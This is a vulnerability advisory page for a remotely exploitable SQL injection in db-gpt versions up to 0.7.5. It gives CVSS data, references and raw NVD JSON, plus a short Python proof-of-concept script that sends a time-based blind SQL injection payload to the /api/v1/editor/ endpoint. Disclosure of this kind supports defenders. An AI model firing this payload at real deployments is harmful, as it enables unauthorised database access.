CVE-2026-4504

Description

A flaw has been found in eosphoros-ai db-gpt up to 0.7.5. This vulnerability affects unknown code of the file /api/v1/editor/ of the component Incomplete Fix. This manipulation causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

eosphoros-ai db-gpt <= 0.7.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_sqli_vuln(target_url):
    """
    Proof of Concept for CVE-2026-4504
    Target: eosphoros-ai db-gpt <= 0.7.5
    Endpoint: /api/v1/editor/
    Vulnerability Type: SQL Injection
    """
    # Vulnerable endpoint
    full_url = f"{target_url}/api/v1/editor/"

    # Payload to test for SQL Injection (Time-based blind)
    # Attempting to cause a delay of 5 seconds
    payload = {
        "id": "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -"
    }

    try:
        print(f"[*] Sending payload to {full_url}...")
        response = requests.post(full_url, data=payload, timeout=10)

        # Check if response time indicates successful injection
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability confirmed! SQL Injection detected.")
            print(f"[+] Response status: {response.status_code}")
        else:
            print("[-] Vulnerability not detected or payload failed.")
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target host
    target = "http://127.0.0.1:5000"
    check_sqli_vuln(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4504
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4504
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4504/
[4] VulDB https://vuldb.com/cve/CVE-2026-4504
[5] https://huntr.com/bounties/e32fda74-ca83-431c-8de8-08274ba686c9
[6] https://vuldb.com/?ctiid.352070
[7] https://vuldb.com/?id.352070
[8] https://vuldb.com/?submit.773891

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4504", "sourceIdentifier": "[email protected]", "published": "2026-03-20T20:16:50.680", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in eosphoros-ai db-gpt up to 0.7.5. This vulnerability affects unknown code of the file /api/v1/editor/ of the component Incomplete Fix. This manipulation causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha encontrado una falla en eosphoros-ai db-gpt hasta la versión 0.7.5. Esta vulnerabilidad afecta código desconocido del archivo /api/v1/editor/ del componente Incomplete Fix. Esta manipulación causa inyección SQL. Es posible iniciar el ataque remotamente. El exploit ha sido publicado y puede ser utilizado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://huntr.com/bounties/e32fda74-ca83-431c-8de8-08274ba686c9", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.352070", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.352070", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.773891", "source": "[email protected]"}]}}